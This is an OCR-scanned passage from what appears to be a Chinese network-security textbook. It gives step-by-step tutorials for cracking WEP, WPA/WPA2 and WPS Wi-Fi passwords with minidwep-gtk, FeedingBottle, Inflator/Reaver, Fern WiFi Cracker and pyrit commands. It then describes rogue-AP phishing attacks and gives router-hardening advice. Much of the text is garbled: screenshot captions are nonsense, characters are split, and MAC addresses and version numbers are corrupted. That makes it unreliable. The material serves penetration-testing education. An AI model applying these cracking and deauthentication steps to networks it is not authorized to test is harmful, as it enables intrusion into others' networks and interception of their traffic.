按钮 ， 扫 描 出 结果 后 会 给 出 详细 信息 ， 如 


THT2.43- 等待 命中 


局 Ampiayrg es 
站 Aieplarmg 
Capiarmg 5s 
Depeyrg 
Mmepleyre 7 

注入 表率 
四 中 


单 击 “ 启 动 ”按钮 ， 此 时 minidwep-gtk 
会 调用 aireplay-ng 打 断 客户 端 与 AP 之 间 的 连 
接 ， 抓 取 有 效 连接 信息 并 开始 重 放 数据 包 ， 
此 时 IVs 数 量 会 不 断 增加 ， 在 IVs 数 量 增加 的 
同时 minidwep-gtk 尝 试 进行 破解 密码 ， 如 下 
图 所 示 ， 玻 解 出 密码 后 会 给 出 提示 。 


无 网 二 


wam | 
el 
ppyol 
信 刘 
a -| 
加 秘方 或 
we | 


隧 由 MAC 。。 名 禾 。 济 度 信道 。 加 中 方式 宕 疡 久 MAC 


方式 注 拓 
NiepBym 2 
mm rr 晶 
DAigewmg4 | 153916->Bahatepbyng 5 
Amepbyrg 5 | S306->Rmanepiang 3 
imme 1sa9r6 seareoloy rg 290041 

证人 通 市 1539416-> 拓 到 一 人 客户 广 MACDC6D CDZ6TEXB 时 出 
S00 »]| 


数量 :76 


8.4.2 使 用 minidwep-gtk 破 解 WPA/ 
WPA2 密 码 
使 用 minidwep-gtk 破 解 WPA/WPA2 密 码 
需要 以 下 几 个 步骤 : 
启动 minidwep-gtk 并 将 加 密 方式 调整 为 
WPA/WPA2 方 式 并 启动 扫描 ， 如 下 图 所 示 。 


无 天 上 路 由 MAC 名称 。 强度 。 信 遂 加 定 方 式 PAC 
= | EE 3_6 HH sa 
wn ps 四 
Wao ram | 1CFA68O12F08_Test001 36 1 DCSDCDSEFECB 
ll (495.EG12CA21_ChinanetKTIKSF -62_11_ WPAZWPA_ wps 
信者 47D2426E600_mmwi -62_10_wPA2 = 和 
AI | Acraoaeaal23_ pqzm_ 2 WPA 
RR EC26CAA4yaC2_TP 2 pazWPA pe 
| | aosenazzprc ha Sl_ 1 WeAmes Le] 
EE cover 
2421-> 和 村 命中 
4a 上 上 
排序 pin 和 码 
M0 
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[step 图 选择 需要 破解 的 AP 单 击 “ 启 动 ” 按 
钮 ， 一 单 获 取 到 握手 包 信息 minidwep-gtk 会 
给 出 提示 ， 如 下 图 所 示 。 


一 WN ep 30513: 


2 


azCD325073 国名 了 园 团 。 -113 6_wPAzwpA 


已 到 入 WPA 提 于 包 ， 选择 一 个 于 贷 撮 昌 码 呈 


pa 四 co] oor | eaphel 
i Hands | 
加 Ar Te | 
1E2621->WPA 于 名 生机 Di 


182551->Wai dseronds for authenticaton handshakel 器 sa 
了 


单 击 OK 按钮 ， 在 密码 选择 界面 中 选 
择 一 个 密码 ， 如 下 图 所 示 。 


引 = 同 
-一 r 一 Er | 
se 外 mmower 1 
@ ieeenty ures horgrqQrp2s 22 
Boor CAS8 ON2F OR handsmaie ap 04D kK 1826 
Sespiem NEFA-S8 O12F 08 handshaie cap hecap 392 bytes 1826 
CouNux HCAS8 O12F08 handshate cap wip 26k8 i826 
bahah27 坦 bps E22 
(iesocketd Obyms 1822 
nidwep ed S29 bytes 201000202B 
serverauh SEU 到 by 1822 
= el 
@one | or 


通过 字典 比 对 计算 出 WPA/WPA2 的 密 
码 ， 如 果 字 典 里 存在 密码 一 定 会 破解 出 来 ， 
破解 出 密码 后 会 给 出 提示 ， 如 下 图 所 示 。 


ing wep -gt Os TAInE 


Klimt ahc ap， 到 se 
CGa0t2P08_Testo01_ -177 [ 
sm 
asacpaac073 四 省 固 目 、 127_5_wpazwpa IH 
Caauaso66sno B .66 WPAAVA_ 
和 和 而 = 
四 gameaeon 
和 Ed 站队 botaro8 2_mps 


WPA KEY: Password 


‘el 100238>alrcrace ng 已 经 退出 
加 10.00:11-> 已 启动 sircrack-ng, 搂 妃 字 移 中 的 电码 
Dw Handshake fle for Hashcatfimp/iC-FA-68-01-2F. OR-handshae cap hceal 
2 endshate efor WsA/emo lice.68.01.2E08 hancshale can ko [7 上 


8.4.3 使 用 minidwep-gtk 破 解 WPS 密 码 


使 用 minidwep-gtk 破 解 WPS 密 码 需要 以 
下 几 个 步 又 : 
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[step 图 启动 minidwep-gtk 并 启动 扫描 ， 如 果 
是 破解 WPS 方 式 的 PIN 码 不 用 关心 加 密 方 
式 ， 在 扫描 出 的 AP 列表 中 ， 如 果 存 在 WPS 
在 其 尾部 会 进行 标注 ， 如 下 图 所 示 。 


minidwep-8k-30513-fine El 
加 由 MAC 。。 包 稳 。 强 曼 。 信 盏 加 训 方 式 PMAC 
WPAZWPA_5800E389084[ 


A 
0 er 
. ONO- 和 从中 


step 图 选择 好 AP 后 单 击 Reaver 按 钮 ， 此 时 会 
弹出 一 个 Reaver 初 始 参数 列表 对 话 框 ， 如 下 
图 所 示 。 


无 网 上 有 由 NMAC。 名和 
| F483cD335073 由 
CFASAON2FON_Tesr001 


加 也 方式 
WPNWPA2 


这 参数 
2808 -1 -5 /tmp/minidwe 


排序 pn 所 
NMR: 6 


step 图 启动 Reaver 开 始 破解 PIN 码 ， 如 下 图 
所 示 。 


wlan0 mon1 1C:FA:68:01:2F:08 
+ tee /tmp/miniduep/1C:FA:68:01:2F:08.109 


od 


Reaver v1,4 WiFi Protected Setup Attack Tool 
[Copsright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffnerQtacnetso 
1.comy 


[+] Restored prev 


sd 
plete @ 2018-11-19 11:06:30 (B seconds/pin) 
Trying pin 44445676 


局- 


8.4.4 使 用 FeedingBotle 工 具 破 解 
WEP 密 码 


使 用 FeedingBottle 破 解 WEP 密 码 可 以 使 
以 下 步骤 : 


step 国 双击 FeedingBottle 图 标 启 动 软件 ， 如 


下 图 所 示 。 


se 加 下 图 为 启动 后 的 界面 。 单 击 Yes 按 钮 
进入 下 一 步 。 


一 一 


[sep 图 在 无 线 网 卡 界 面 选择 无 线 网 卡 ， 如 下 
A 单 击 Next 按 钮 进入 下 一 步 。 


FeedingBotte Ew 


step 加 AP 扫描 界面 选择 AP 加 密 方式 信道 等 
配置 项 ， 单 击 Scan 按钮 启动 扫描 ， 如 下 图 
所 示 。 


选中 扫描 出 的 AP， 在 Clinets Information 
显示 出 接 入 AP 的 客户 端 信息 ， 如 下 图 
内 了 。 单 击 Next 按 钮 进入 下 一 步 。 


Estee 国 破解 界面 有 4 种 方式 可 选 ， 这 里 同 
样 是 使 用 aireplay-ng 进 行 发 包 获 取 IVs 值 。 
如 果 没 有 获取 到 客户 端 握手 包 ， 可 以 单 击 
Deauth 按 钮 打 断 客户 端 与 AP 的 连接 ， 如 下 
图 所 示 ， 剩 下 的 时 间 等 待 足够 多 的 IVs 后 破 
解 出 密码 。 


Feedingbottle 


8.4.5 使 用 FeedingBotle 工 具 破 解 


WPA/WPA2 密 码 
使 用 FeedingBottle 破 解 WPA/WPA2 密 码 
可 以 使 用 以 下 步 又: 


step 国 在 无 线 网 卡 界 面 选 择 无 线 网 卡 ， 如 下 
图 所 示 。 单 击 Next 按 钮 进入 下 一 步 。 


FeedingBottle 


step 图 将 加 密 方 式 切换 为 WPA/WPA2， 并 单 
击 Scan 按 钮 扫描 AP， 如 下 图 所 示 。 
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FeedingBottle 


step 图 选择 目标 AP 以 及 连接 AP 的 客户 端 ， 如 
下 图 所 示 。 单 击 Next 按 钮 进入 下 一 步 。 


FeedingBorle Omix) 


step 园 在 破解 页 面 中 会 有 AP 的 信息 ， 以 及 


接 入 AP 客 户 端的 信息 ， 如 下 图 所 示 。 
FeedingBottle be 


[step 图 单 击 Start 按 钮 ， 在 弹出 的 对 话 框 中 选 
择 一 个 字典 文件 ， 如 下 图 所 示 。 选 择 完 成 
后 单 击 OK 按钮 。 


Dictionary Flle Chooser EE 
Su Files (* | Favorites | 
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Step 图 通过 上 一 步 的 设置 ， 此 时 会 抓 取 握手 
信息 ， 如 下 图 所 示 。 在 抓 包 过 程 中 需要 单 


击破 解 界面 中 的 Deauth 按 钮 。 


alrodump-ng po 


CH 1 I Elapsed; 24 5 J[ 2040-14-19 10:26 


B51D PR Rad sata, ws CH ME ENC CIPHER MUIH E 
AsFArE9s0l:TF:0 -127 本 1 检 0 1 Sle, ua CCHPp Psk T 

Bs51D STATION WR Race Lost Frames Probe 
1C:FA:68:01:2F:08 DC:6I:CD:66:FE:CB -127 0-6 6 1 wl) 


step 园 一 旦 抓 取 到 握手 信息 后 ，FeedingBottle 
会 按照 字典 文件 开始 破解 ， 如 果 字 典 文件 
中 没有 密码 会 提示 更 换 字典 文件 ， 如 下 图 
所 示 。 


step 国 破解 出 密码 后 ， 下 方 WPA Key 会 给 出 
正确 的 密码 ， 如 下 图 所 示 。 


FeedingBottle 


8.4.6 ”使 用 Inflator 工 具 破 解 WPS 密 码 


step 回 双击 Inflator 图 标 启 动 软件 ， 如 下 图 
所 示 。 


in 


Step 图 启动 后 的 界面 如 下 图 所 示 ， 单 击 Yes 
按钮 。 


Inflator 1.0(for Reaver v1.4) 


step 图 从 网 卡 列表 中 选 
所 示 。 单 击 Next 按 钮 进入 下 一 步 。 


IAflator 1.0(for Reaver V1.4) 


至 无 线 网 卡 ， 如 下 图 


step 贺 单 击 Scan for WPS enabled APs 按 钮 ， 
如 下 图 所 示 。 选 中 目标 AP， 单 击 Next 按 钮 
进入 下 一 步 。 


Tnflator 1.0(for Reaver v1.4) 


1 Channel 


使 用 
下 步 又: 


Inflator 破 解 WPS 密 码 可 以 使 


以 
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et 人 


step 图 在 破解 WPS 界 面 中 ， 可 以 看 到 下 方 同 
样 是 使 用 Reaver 进 行 破解 ， 同 时 给 出 了 初始 
命令 ， 如 果 需 要 额外 添加 命令 可 以 勾 选 上 


方 给 出 的 参数 ， 如 下 图 所 示 。 


Inflator 1.0(for Reaver v1.4) 


Step 图 单 击 Run 按 钮 启动 Reaver 开 始 破 解 PIN 
码 ， 如 下 图 所 示 。 
Reaver Os) 


Reaver v1,4 WiFi Protected Setup Attack Tool 
Copuright. (c) 2011, Tactical Network Solutions, Craig Heffner 
1.con> 


cheffneretacnetso 


[+] Uaiting for beacon from 1C:Fh:6 
[1] WARNING: Failed to as: 


[4 


8.5 


实战 演练 1 一 一 使 用 Fern WiFi Cracker 


破解 AP 密 码 

对 于 喜欢 图 形 化 界面 的 用 户 来 说 ， 这 
是 一 款 福利 工具 ， 在 使 用 该 工具 之 前 ， 
议 手动 关闭 那些 可 能 影响 程序 正常 运行 


使 用 Fern WiFi Cracker 破 解 AP 密 码 的 操 
作 步 又 如 下 : 
[sep 贺 选择 “应 用 程序 ”菜单 列表 下 的 “无 
线 攻 击 ” 菜 单 ， 在 无 线 攻 击 菜单 中 有 fern 
WiFi， 如 下 图 所 示 。 


田 - 


无 线路 


step 图 选择 fern WiFi 选 项 ， 可 以 打开 该 工 


具 ， 下 图 为 其 工作 界面 。 


Fern WIFICracker Oe 


step 贺 单 击 select Interface 右 侧 的 下 拉 按 钮 ， 
在 弹出 的 下 拉 列 表 中 选择 一 块 网 卡 ， 如 下 
图 所 示 。 


Bnet | 


step 国 选择 完 网 卡 后 ， 会 弹出 一 个 提示 框 ， 


单 击 OK 按 钮 即 可 ， 如 下 图 所 示 。 


Tips - Scan settings © 


ToAccess the "Settings" forthe network scan preferences "Double click" 
on any area of the main window, "Scan for network button" is used to 
scan for network based on the settings options of the settings dialog 


Default is automated scan, Fake Mac-Address is always used 


Don't show this message again 


ca 


[step 图 选择 完 网 卡 后 ， 单 击 下 方 的 “扫描 ” 
按钮 ， 开 始 扫描 数据 信息 ， 如 下 图 所 示 。 


ma wang | SB reren | 


led on wlanomon 


Monito 


(办 Scan for Access points 


器 的 密码 安全 策略 一 于 
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[step 园 扫描 过 程 中 ， 在 下 方 WEP 与 WPA 按 钮 
旁 ， 会 出 现 相应 的 数字 信息 ， 这 些 数 字 代 表 
搜索 的 AP 数量 ， 如 下 图 所 示 。 

(2) 


Active 


QFi) 


7 Detected 


(Wi WPA 


[step 国 单 击 WPA 按 钮 ， 即 可 进入 扫描 到 的 
AP 页 面 ， 如 下 图 所 示 。 


侈 提 示 : 扫描 结果 页 面 大 致 分 为 以 下 几 个 
区 域 : 

(1) AP 列表 。 这 里 会 以 列表 的 形式 列 
出 已 经 扫描 出 的 AP， 如 下 图 所 示 。 


选中 AP 列表 中 的 AP 以 
如 下 图 


(2) 详细 数据 。 
下 方 会 列 出 该 AP 的 详细 信息 ， 
所 示 。 


(3) 破解 选项 。 这 里 会 有 常规 破解 和 
WPS 方 式 破 解 两 个 选项 ， 如 下 图 所 示 。 


Attack Option 
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(4) 破解 进度 区 。 该 区 域 左 侧 显示 破解 
步骤 、 下 方 是 破解 进度 条 、 右 侧 有 选择 密码 


文件 按钮 以 及 客户 端 列表 ， 如 下 图 所 示 。 


[Eee 图 选中 需要 破解 的 AP， 查 看 是 否 有 
客户 端 接 入 ， 然 后 选择 密码 文件 ， 单 击 
Browse 按 钮 ， 如 下 图 所 示 。 


step 图 单 击 破解 Attack 按 钮 ， 这 时 按钮 的 文 
本 显示 会 换 成 Stop， 如 下 图 所 示 ， 如 果 需 要 
停止 破解 ， 可 以 单 击 Stop 按 钮 。 


此 时 程序 会 尝试 中 断 AP 与 客户 端的 
连接 ， 如 下 图 所 示 。 
Probing Access Point 


Deauthenticating DC:6D:CD:66:FE:CB 


[step 柄 当 抓 取 到 关联 信息 后 ， 开 始 破解 ， 如 
下 图 所 示 。 而 且 抓 取 到 信息 文本 会 加 粗 颜 
色 并 变 成 黄色 来 显示 ， 没 有 抓 取 到 则 显示 
为 灰色 。 


Handshake Captured 


Bruteforcing WPA Encryption 


Finished 


[step 图 破解 完成 后 会 提示 破解 出 的 密码 ， 如 
下 图 所 示 。 
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实战 演练 2 一 一 使 用 pyrit 工 具 破 解 AP 密 码 


pyrit 是 一 款 开源 且 完 全 免费 的 软件 ， 任 何人 都 可 以 检查 ， 复 制 或 修改 它 。 它 在 各 种 平 
台 上 编译 和 执行 ， 包 括 FreeBSD、MacOS X 和 Linux 作 为 操作 系统 以 及 x86、alpha、arm 等 
处 理 器 。 

使 用 pyrit 工 具 最 大 的 优点 ， 在 于 它 可 以 使 用 除 CPU 之 外 的 GPU 运算 加 速生 成 彩虹 表 ， 
本 身 支 持 抓 包 获取 四 步 握手 过 程 ， 无 须 使 用 airodump 抓 包 ， 如 果 已 经 通过 ariodump 抓 取 数 
据 ， 也 可 以 使 用 pyrit 进 行 读 取 。 

问题 : 什么 是 彩虹 表 ? 

答 : 彩虹 表 是 一 个 用 于 加 密 散 列 函 数 逆 运算 的 预先 计算 好 的 表 ， 为 破解 密码 的 散 列 值 
(或 称 哈 希 值 、 微 缩 图 、 摘 要 、 指 纹 、 哈 希 密 文 ) 而 准备 。 一 般 主流 的 彩虹 表 都 在 100GB 
以 上 。 这 样 的 表 常常 用 于 恢复 由 有 限 集 字符 组 成 的 固定 长 度 的 纯 文本 密码 。 

使 用 pyrit 命 令 ， 查 看 pyrit 工 具 的 帮助 信息 ， 如 下 图 所 示 。 

[root@kali: ~“# pyrit 


https://github. com/JpaulMora/Pyrit 
Nhis code is distributed under the GNU General Public License v3 


Usage: pyrit [options] command 

Recognized options: 
. : Filters AccessPoint by BSSID 

: Filters AccessPoint by ESSID 

: Print help for a certain command 

: Filename for input ('-' is stdin) 

: Filename for output ('-' is stdout) 

: Packet capture source in pcap-format 

: URL of the storage-system to use 

-~-all-handshakes : Use all handshakes instead of the best one 

--aes : Use AES 


主要 参数 介绍 如 下 : 

-b: 按 BSSID 筛 选 AccessPoint。 

-e: 按 ESSID 过 滤 AccessPoint。 

-h: 打印 某 个 命令 的 帮助 。 

-i: 输入 的 文件 名 〈'- ' 是 stdin) 。 

: 输出 的 文件 名 〈' - ' 是 stdout) 。 

-r: pcap 格 式 的 数据 包 捕 获 源 。 

-u: 要 使 用 的 存储 系统 的 URL。 

--all-handshakes: 使 用 所 有 的 握手 ， 而 不 是 最 好 的 握手 。 
aes: 使 用 AES。 

pyrit 工 具 可 识别 的 命令 如 下 : 

analyze: 分 析 数 据 包 捕获 文件 。 

attack_batch: 攻击 从 数据 库 的 PMKs /密码 握手 。 
attack_cowpatty: 攻击 一 个 来 自 cowpatty 文 件 的 PMK 握 手 。 
attack db: 攻击 与 数据 库 中 的 PMK 握 手 。 
attack_passthrough: 用 文件 中 的 密码 攻击 握手 。 

batch: 批 处 理 数据 库 。 

benchmark: 确定 可 用 内 核 的 性 能 。 

benchmark long: 更 长 和 更 准确 的 基准 版 本 。 

check db: 检查 数据 库 是 否 有 错误 。 


240 上 了 


© © © © © © © © 
1 
口 
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create_essid: 创建 一 个 新 的 ESSID。 

delete_essid: 从 数据 库 中 删除 一 个 ESSID。 

eval: 计算 可 用 密码 和 匹配 结果 。 

export_ cowpatty: 将 结果 导出 到 新 的 cowpatty 文 件 。 
export_hashdb: 将 结果 导出 到 airolib 数 据 库 。 
export_passwords: 将 密码 导出 到 文件 。 

help: 打印 一 般 帮 助 。 

import passwords: 从 类 文件 源 导入 密码 。 
import_unique_passwords: 从 类 文件 源 导入 唯一 密码 。 
list_cores: 列 出 可 用 的 核心 。 

list_essids: 列 出 所 有 ESSID， 但 不 计 入 匹配 结果 。 
passthrough: 计算 PMK 并 将 结果 写 入 文件 。 

relay: 通过 RPC 中 继 一 个 存储 URL。 

selftest: 测试 硬件 以 确保 其 计算 正确 的 结果 。 
serve: 为 其 他 pyrit 客 户 提供 本 地 硬件 。 

strip: 将 数据 包 捕 获 文 件 剥 离 到 相关 数据 包 中 。 
stripLive: 捕获 来 自 现 场 捕获 源 的 相关 数据 包 。 
verify: 通过 重新 计算 ， 验 证 结果 的 10% 。 


使 用 pyrit 进 行 破解 无 线路 由 器 密码 的 操作 步骤 如 下 : 
使 用 pyrit -r wlan0mon -o wpa.cap stripLive 命 令 ， 开 始 抓 取 数据 包 ， 如 下 图 所 示 。 


root@kali:~# pyrit -Fr WUangmon -0 wpa.cap stripLive 

Pyrit 69.5.1 (C) 2698-2911 Lukas Lueg - 2915 John Mora 
https://github.com/JPaulMora/Pyrit 

This code is distributed under the GNU General Public License v3+ 


Parsing packets from 'wLangmon'..， 

1/1: New AccessPoint 59:2b:73:c4:72:56 (' 哇 味 味 ! 这 里 没 WiFi 哦 ! ') 
2/2: New AccessPoint e4:68:a3:7d:37:92 ('CMCC-X]') 

3/3: New AccessPoint f4:83:cd:33:69:73 (' 中 

3/7: New Station 39:84:54:d6:ca:b9 (AP e4:68:a3:7d:37:92) 
4/8: New AccessPoint 94:88:5e:9a:1lb:82 ('63ER06') 

5/12: New AccessPoint 86:83:cd:33:60:73 ('TPGuest 6073') 
6/17: New AccessPoint lc:fa:68:91:2f:98 ('Test-991') 
7/27: New AccessPoint e4:68:a3:7d:37:99 ('CMCC') 

8/29: New AccessPoint e4:68:a3:7d:37:91 ('and-Business') 
9/39: New AccessPoint e4:68:a3:7d:37:95 ('A') 


使 用 pyrit -r wpa.cap analyze 命 令 ， 对 抓 取 到 的 数据 包 进 行 分 析 ， 如 下 图 所 示 。 可 以 
看 到 ，Test-001 这 个 路 由 有 四 步 握手 的 过 程 。 


root@kali:~# pyrit -r wpa.cap analyze 

Pyrit 6.5.1 (C) 2998-2911 Lukas Lueg - 2615 John Mora 
https://github.com/JPaulMora/Pyrit 

This code is distributed under the GNU General Public License v3+ 


Parsing file 'wpa.cap' (1/1)... 
Parsed 82 packets (82 892.11-packets)，got 41 AP(s) 
#24: AccessPoint 1lc:fa:68:91:2f:98 ('Test-991') : 
#1: Station dc:6d:cd:66:fe:cb, 2 handshake(s): 
#1: HMAC SHAl AES, good*, spread 1 
#2: HMAC SHAl AES, workable*, spread 25 
#25: AccessPoint e4:68:a3:7c:85:31 ('and-Business'): 


step 图 如 果 想 要 使 用 ariodump 抓 取 的 数据 包 ， 可 以 使 用 pyrit -r 001-01.cap -o pyritwpa.cap 


strip 命 令 ， 将 airodump 的 数据 包 做 一 个 格式 转换 ， 如 下 图 所 示 。 
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root@kali:-# pyrit -r 6901-61.cap -0 pyritwpa.cap strip 

Pyrit 9.5.1 (C) 2998-2611 Lukas Lueg - 2915 John Mora 
https://github.com/JPaulMora/Pyrit 

This code is distributed under the GNU General Public License v3+ 


Parsing file '991-91.cap' (1/1)... 
Parsed 53 packets (53 862.11-packets), got 1 AP(s) 


#1: AccessPoint 1lc:fa:68:91:2f:698 ('Test-691') 
#0: Station dc:6d:cd:66:fe:cb, 1 handshake(s) 
#1: HMAC SHAl AES, good*, spread 1 


New pcap-file 'pyritwpa.cap' written (17 out of 53 packets) 


step 轩 使 用 pyrit -r< 抓 取 的 数据 包 文 件 >-i< 密 码 文 件 >-b<AP-MAC 地 址 > attack passthrough 命 
令 ， 开 始 破解 密码 ， 这 里 破解 出 的 密码 为 Password， 如 下 图 所 示 。 


rootekati:-# pyrit -r wpa.cap -i /usr/share/john/password.lst -b 1c: 
lattack_passthrough 

Pyrit 6.5.1 (C) 2998-2911 Lukas Lueg - 2915 John Mora 
https://github. com/JpaulMora/Pyrit 

IThis code is distributed under the 6NU General Public License v3+ 


parsing file ‘wpa.cap’ (1/1)... 
Parsed 82 packets (82 802.11-packets), got 41 AP(5) 


[Tried 647 PMKs so far; 718 PMKs per second. #!comnent: This list has been compited 
by Solar Designer of Ope 


IThe password is ‘Password'. 


8.6 ”小 试 身 手 


练习 1: 熟悉 aircrack-ng 工 具 套 件 。 

练习 2: 使 用 aircrack-ng 破 解 WEP、WPA 以 及 WPS 密 码 。 
练习 3: 使 用 图 形 化 工具 破解 WEP 密 码 。 

练习 4: 使 用 CDlinux 系 统 工具 破解 无 线路 由 器 密码 。 
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通过 扫描 探测 可 以 发 现 附近 AP 信息 ， 通 过 这 些 AP 信 息 可 以 虚拟 出 一 个 与 AP 信息 完全 
相同 的 AP， 这 样 做 可 以 实现 信息 过 滤 ， 也 能 在 一 定 程度 上 起 到 保护 AP 的 作用 。 


9.1 虚拟 AP 技术 


虚拟 AP 技术 相当 于 使 用 计算 机 设备 
通过 软件 模拟 AP， 通 过 计算 机 可 以 设置 
DHCP 服 务 器 ， 接 入 AP 的 网 络 设备 通过 计 
算 机 共享 上 网 。 


对 灌 光 9.1.1 ”认识 虚拟 AP 技术 


虚拟 AP 技术 从 Windows 7 操作 系统 开始 
就 存在 了 。 要 想 实现 虚拟 AP， 需 要 用 户 的 
计算 机 准备 两 块 网 卡 ， 一 块 有 线 网 卡 ， 一 
块 无 线 网 卡 ， 其 中 ， 有 线 网 卡 用 来 上 网 ， 
无 线 网 卡 用 来 发 射 信号 。 这 样 一 旦 有 设备 
接 入 虚拟 AP， 就 可 以 通过 抓 包 的 方式 来 查 
看 该 设备 的 网 络 通信 数据 了 。 

虚拟 AP 技术 主要 是 用 来 网 络 共 享 的 ， 
如 果 当 前 只 能 一 台 计 算 机 上 网 ， 这 个 方 
法 可 以 实现 不 同 设备 共享 计算 机 的 有 线 网 
络 ， 但 同时 也 可 能 成 为 黑客 恶意 攻击 的 一 
种 方法 。 当 然 随 着 无 线 网 的 发 展 ， 虚 拟 AP 
已 经 由 主要 的 网 络 共享 转变 为 多 种 功能 ， 
例如 通过 接 入 虚拟 AP 来 抓 取 网 络 数据 包 ， 
对 于 网 络 分 析 是 非常 有 帮助 的 。 

除 Windows 系 统 可 以 虚拟 AP 外 ，Kali 
Linux 系 统 同 样 也 可 以 虚拟 AP， 并 且 通 过 
Kali Linux 系 统 还 可 以 完全 模拟 AP 的 整个 转 
发 过 程 。 


驶 9.1.2 ”防范 虚拟 AP 的 钓鱼 攻击 


伪 AP 钓 鱼 攻击 ， 是 通过 仿照 正常 的 
AP， 拱 建 一 个 伪 AP， 然 后 通过 对 合法 AP 进 
行 拒绝 服务 攻击 或 者 提供 比 合法 AP 更 强 的 


信号 ， 人 迫使 无 线 客户 端 连接 到 伪 AP， 这 是 
因为 无 线 客户 端 通常 会 选择 信号 比较 强 或 
者 信 噪 比 (SNR) 低 的 AP 进行 连接 。 

为 了 使 客户 端 连接 达到 无 颖 切换 的 效 
果 ， 伪 AP 应 该 以 桥接 方式 连接 到 另外 一 个 
网 络 。 如 果 成 功 进行 了 攻击 ， 则 会 完全 控制 
无 线 客户 端 网 络 连接 ， 并 且 可 以 发 起 任何 进 
一 步 的 攻击 。 发 起 无 线 钓鱼 攻击 的 黑客 一 般 
会 采取 以 下 步骤 来 最 终 控制 终端 设备 。 


1. 获取 无 线 网 络 的 密 钥 


对 于 采用 WEP 或 WPA 认 证 的 无 线 网 
络 ， 黑 客 可 以 通过 无 线 破解 工具 ， 或 者 采用 
社会 工程 的 方法 ， 来 窃取 目标 无 线 网 络 的 密 
钥 ， 对 于 未 加 密 的 无 线 网 络 则 可 以 省 略 这 一 
步 又， 使 得 无 线 钓 鱼 攻击 更 容易 得 手 。 


2. 伪造 目标 无 线 网 络 


用 户 终 端 在 接 入 一 个 无 线 网 络 之 前 
系统 会 自动 扫描 周围 环境 中 是 否 存在 曾 
经 连接 过 的 无 线 网 络 。 当 存在 这 样 的 网 
络 时 ， 系 统 会 自动 连接 该 无 线 网 络 ， 并 自 
动 完 成 认证 过 程 ， 当 周围 都 是 陌生 的 网 络 
时 ， 需 要 用 户 手工 选择 一 个 无 线 网 络 ， 
输入 该 网 络 的 密 钥 ， 完 成 认证 过 程 。 

黑客 在 伪造 该 无 线 网 络 时 ， 在 目标 无 
线 网 络 附近 架设 一 台 相 同 或 近似 SSID 的 
AP， 并 设置 之 前 窃取 的 无 线 网 络 密 钥 ， 这 
台 伪 AP 一 般 会 设置 成 可 以 桥接 的 软 AP， 因 
此 更 加 隐蔽 ， 不 容易 被 人 发 现 ， 这 样 ， 黑 
客 伪造 AP 的 工作 就 完成 了 。 

由 于 伪造 的 AP 采用 了 相同 的 SSID 和 


网 络 密 钥 ， 对 用 户 来 说 基本 上 很 难 进行 
辨别 ， 并 且 由 于 伪造 AP 使 用 了 高 增益 天 
线 ， 附 近 的 用 户 终端 会 接收 到 较 强 的 无 线 
信号 ， 此 时 在 用 户 终端 上 的 无 线 网 络 列表 
中 ， 这 个 伪造 的 AP 要 优 于 正常 AP 排 在 靠 前 
的 位 置 。 这 样 ， 用 户 就 很 容易 上 当 ， 掉 入 
这 个 被 精心 构造 的 陷阱 中 。 


3. 干扰 合法 无 线 网 络 


对 于 那些 没有 自动 上 钧 的 移动 终端 ， 
为 了 使 其 主动 走 进 布 好 的 陷阱 ， 黑 客 会 对 
附近 合法 的 网 络 发 起 无 线 攻 击 ， 使 得 这 些 
无 线 网 络 处 于 瘫痪 状态 。 这 时 ， 移 动 终端 
会 发 现 原 有 无 线 网 络 不 可 用 ， 重 新 扫描 无 
线 网 络 ， 并 主动 连接 附近 无 线 网 络 中 信号 
强度 最 好 的 AP。 

由 于 其 他 AP 都 不 可 用 ， 并 且 黑 客 伪 
造 的 钓鱼 AP 信号 强度 又 比较 高 ， 移 动 终端 
会 主动 与 伪造 的 AP 建立 连接 ， 并 获取 IP 地 
址 。 至 此 ， 无 线 钓鱼 的 过 程 就 完成 了 。 


4. 截获 流量 或 发 起 进一步 攻击 


无 线 钓鱼 攻击 完成 后 ， 移 动 终端 就 与 
黑客 的 攻击 系统 建立 了 连接 ， 由 于 黑客 采 
用 了 具有 桥接 功能 的 软 AP， 可 以 将 移动 终 
端的 流量 转发 至 Internet， 因 此 移动 终端 仍 
能 继续 上 网 ， 但 此 时 ， 所 有 数据 已 经 被 黑 
客 尽 收 眼 底 。 

黑客 会 捕获 这 些 数据 并 进一步 处 理 ， 
如 果 使 用 中 间 人 攻击 工具 ， 甚 至 可 以 截获 
采用 了 SSL 加 密 的 g-mail 邮 箱 信息 ， 而 那些 
未 加 密 的 信息 更 是 一 览 无 余 。 

更 进一步 ， 由 于 黑客 的 攻击 系统 与 被 
钓鱼 的 终端 建立 了 连接 ， 黑 客 可 以 寻找 可 
利用 的 系统 漏洞 ， 并 截获 终端 的 DNS/URL 
请 求 ， 返 回 攻 击 代 码 ， 给 终端 植 入 木马 ， 
达到 最 终 控 制 用 户 终 端的 目的 。 此 时 ， 连 
接 在 终端 的 设备 可 能 被 黑客 完全 控制 ， 致 
使 危害 进一步 扩大 。 
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9.1.3 无 线 网 络 安全 建议 


针对 当前 无 线 网 络 的 安全 问题 ， 下 面 吕 外 


给 出 一 些 无 线 网 络 安全 的 建议 : 

(1) 不 要 随意 接 入 免费 WiFi 设备 ， 这 
种 情况 下 用 户 的 所 有 个 人 信息 ， 包 括 账 号 
密码 直接 可 以 被 拦截 并 窃取 。 

(2) 计算 机 或 者 手机 尽量 安装 安全 软 
件 ， 这 样 可 以 最 大 程度 减低 安全 风险 。 

(3) 修改 无 线路 由 器 默认 管理 账户 ， 
不 要 使 用 admin 或 root 等 明显 字眼 。 

(4) 设置 无 线路 由 器 的 加 密 方式 为 
WPA/WPA2。 因 为 如 果 是 WEP 加 密 方 式 ， 
无 论 密码 多 长 ， 都 会 很 容易 被 破解 。 

(5) 设置 安全 强度 比较 大 的 无 线 WiFi 
密码 ， 最 好 包含 数字 、 字 母 、 大 小 写 、 特 
殊 字 符 等， 并 且 需 要 10 位 以 上 的 组 合 ， 例 
如 W@Xwod@#…。 

(6) 开启 MAC 地 址 过 滤 功 能 ， 只 绑 定 
自己 的 手机 、 计 算 机 、 平 板 计算 机 等 ， 如 
果 是 陌生 人 想 要 加 入 自己 的 无 线路 由 器 
需要 授权 后 ， 才 可 以 连接 。 

(7) 开启 家 长 控制 功能 ， 只 允许 本 地 
主机 的 MAC 地 址 管理 无 线路 由 器 。 

(8) 关闭 DHCP 服务 。 这 样 即便 密码 
泄露 ， 大 部 分 的 黑客 也 无 法 获取 了 P 地 址 。 

(9) 关闭 WPS 功能 。 这 个 非常 重要 
因为 当前 大 部 分 的 密码 都 是 黑客 通过 WPS 
